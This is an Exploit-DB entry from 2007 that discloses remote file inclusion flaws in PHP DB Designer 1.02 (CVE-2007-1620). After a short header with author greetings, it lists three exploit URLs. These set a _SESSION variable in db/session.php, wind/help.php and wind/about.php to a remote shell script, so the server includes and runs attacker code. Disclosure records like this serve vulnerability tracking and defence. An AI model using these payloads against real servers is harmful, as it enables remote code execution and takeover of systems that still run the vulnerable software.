PHP DB Designer <= 1.02 - Remote File Include Vulnerabilities

2007-03-16T00:00:00
ID EDB-ID:3501
Type exploitdb
Reporter GoLd_M
Modified 2007-03-16T00:00:00

Description

PHP DB Designer <= 1.02 Remote File Include Vulnerabilities. CVE-2007-1620. Webapps exploit for php platform

                                        
                                            # PHP DB Designer &lt;= 1.02 Remote File Include Exploit
# D.Script: http://sourceforge.net/projects/phpdbdesigner/
# Discovered by: GloD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
# Exploit:[Path]/db/session.php?_SESSION[DRIVER]=Shell
# Exploit:[Path]/wind/help.php?_SESSION[SITE_PATH]=Shell
# Exploit:[Path]/wind/about.php?_SESSION[SITE_PATH]=Shell

# milw0rm.com [2007-03-16]